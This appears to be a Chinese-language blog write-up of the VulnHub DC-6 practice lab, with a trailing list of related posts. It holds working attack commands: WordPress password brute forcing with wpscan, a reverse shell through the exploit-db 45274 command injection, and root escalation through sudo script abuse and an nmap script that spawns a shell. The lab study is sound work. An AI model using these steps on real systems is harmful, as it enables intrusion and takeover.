靶场练习第十四天~vulnhub靶场之dc-6
一、准备工作
kali和靶机都选择NAT模式(kali与靶机同网段)
1.靶场环境
下载链接: 百度网盘 请输入提取码 提取码: bazx
2.kali的ip
命令:ifconfig
3.靶机的ip
扫描靶机ip
命令:sudo arp-scan -l
二、信息收集
1.nmap的信息收集
(1)扫描靶机开放的端口及其服务
nmap -sV -p- 192.168.101.119
(2)看看详细信息
nmap -A -p- 192.168.101.119
2.网站的信息收集
(1)访问靶机的网站
1.先从80端口寻找突破口,访问一下http://192.168.101.119 ,发现URL栏写的不是靶机的ip,而是http://wordy/,而很明显,DNS没有解析出来
2.回过头来注意到nmap扫描时有这样一个提示,基本可以确认需要手动配置hosts文件
(2)配置hosts文件
1.sudo vim /etc/hosts ;在文件添加:192.168.101.115(靶机ip) wordy
2.再次访问http://192.168.101.115
没有发现啥有用信息,只是知道这个是一个WordPress网站
(3)用wpscan工具看看这个靶机网站有什么用户
wpscan --url http://wordy --enumerate u
发现了几个用户
(4)用dirb扫描看看网站的后台登录是哪个网址
dirb http://wordy
1.打开http://wordy/wp-admin/ ,发现登录网址
(5)wpscan字典爆破
1.在桌面创建一个wordy-pass1.dic文件
2.将rockyou.txt里面的密码复制到wordy-pass1.dic
cd /usr/share/wordlists/
ls
cp rockyou.txt /home/kali/桌面/wordy-pass1.dic
3.将刚才得到的用户放在文件user.txt
vim user.txt
cat user.txt
3.使用wpscan进行密码爆破
常规的方法跑太费时间,把一部分密码拿出来跑
cat /usr/share/wordlists/rockyou.txt | grep k01 > wordy-pass1.dic
wpscan --ignore-main-redirect --url http://wordy -U user.txt -P wordy-pass1.dic --force
得出Username: mark, Password: helpdesk01
用爆破出来的用户密码登录
成功登录到网站后台
(6)使用mark用户登录后台,发现一个插件Activity monitor,猜测这个插件存在漏洞
1.searchsploitg工具查看Activity monitor漏洞
searchsploit Activity monitor
发现是命令注入漏洞
(1)修改html代码action跳转及shell反弹IP地址到kali本机
cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html
cp 45274.html 45274.html.bak
vim 45274.html
(2)Kali临时开启HTTP服务,并访问45274.html页面
python -m SimpleHTTPServer 80
同时在kali终端这边开启监听9999端口,在页面点击submit request后,反弹shell成功
(3)优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):
python -c ‘import pty;pty.spawn(“/bin/bash”)’
三、提权
1. 进入到mark用户的家目录下,stuff文件下有一个things-to-do.txt文件,查看文件内容发现graham用户及登录密码
cd /home/mark/stuff
ls
cat things-to-do.txt
2.用得到的用户密码ssh远程登录
ssh graham@192.168.101.119
3. graham用户成功登录后,查看当前用户可以执行的操作
sudo -l
发现可以运行jens用户下面的backups.sh
4.查看backups.sh
cd /home/jens
ls
cat backups.sh
5. 在backups.sh文件中写入/bin/bash,并以jens用户去执行该脚本
echo "/bin/bash" >> backups.sh
sudo -u jens ./backups.sh
6.获得jens用户权限时,查看jens用户可执行的操作
sudo -l
发现jens用户可以在无密码状态下使用nmap命令
7. 发现flag
写入一条命令到getShell,并通过nmap运行getShell成功进入root用户,在/root目录下找到theflag.txt文件
echo 'os.execute("/bin/sh")' > getShell
sudo nmap --script=getShell
cd /root
cat theflag.txt
靶场练习第十四天~vulnhub靶场之dc-6相关推荐
- 靶场练习第二十五天~vulnhub靶场之Raven-2
一.准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机 ...
- 【甄选靶场】Vulnhub百个项目渗透——项目二十四:MINU-1(WAF绕过,JWT爆破)
Vulnhub百个项目渗透 Vulnhub百个项目渗透--项目二十四:MINU-1(WAF绕过,JWT爆破) 靶场地址
- XSS-14、15注入靶场闯关(小游戏)——第十四、五关
注意:十四关的链接失效了,没办法做. 1.从14关下边可以点解链接跳转到15关,一般人都会点. 2.没错,这就是个坑.这里跳转过来的时候他给的是一个错误地址.所以注意要去15关直接修改level后面的 ...
- Vulnhub靶场题解
Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...
- 【VulnHub靶场】——BOREDHACKERBLOG: CLOUD AV
作者名:Demo不是emo 主页面链接:主页传送门 创作初心:舞台再大,你不上台,永远是观众,没人会关心你努不努力,摔的痛不痛,他们只会看你最后站在什么位置,然后羡慕或鄙夷 座右铭:不要让时代的悲哀 ...
- VulnHub靶场LupinOne
VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 链接:https://pan.baidu.com/s/1lX79juqZJl4roKakTwWQx ...
- VulnHub靶场之HA: FORENSICS
VulnHub靶场之HA: FORENSICS 查看ip: 扫描端口,发现开放80端口与22端口,访问80端口,, 扫描目录,发现tips.txt: 下载zip,发现需要密码,访问igolder目录, ...
- 靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1
兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动. 至于为什么要这样操作 ...
- VulnHub靶场系列:Flick
VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...
最新文章
- 收藏 | 2021 十大机器学习库
- 在asp.net中如何管理cache
- 一次性供应商不能用特别总账标准程序修改
- h5应用数据加密_邦伲德H5场景个性化开发,打破传统营销局限
- jquery中阻止事件冒泡的方法
- 国内pinterest模式昙花一现 社交电商不该这么玩
- vivado中bit文件怎么没有生成_【新手入门】ISE工程升级到Vivado及板级信号调试技术...
- asp中 打开网页时出现“操作必须使用一个可更新的查询”原因及解决办法
- DGUS组态软件中图标旋转显示如何使用
- 十余种无限流量卡大对比,这一种的最实惠!
- BZOJ 2144 跳跳棋(LCA+欧几里德+二分答案)
- java 判断手机运营商_如何用java判断手机号运营商?
- 多无线路由器AP使用同一个SSID号无缝连接漫游
- 派克液压泵电控比例放大器
- matlab中axis square与axis equal区别
- 第八节 Electron主进程和渲染进程之间的通信
- 在 Windows 11、10 中隐藏某个磁盘
- Lieges of Legendre CodeForces - 603C (博弈论,SG找规律)
- 浅谈互联网赚钱的几种方式
- 【Linux】远程下载 Google Drive 文件方法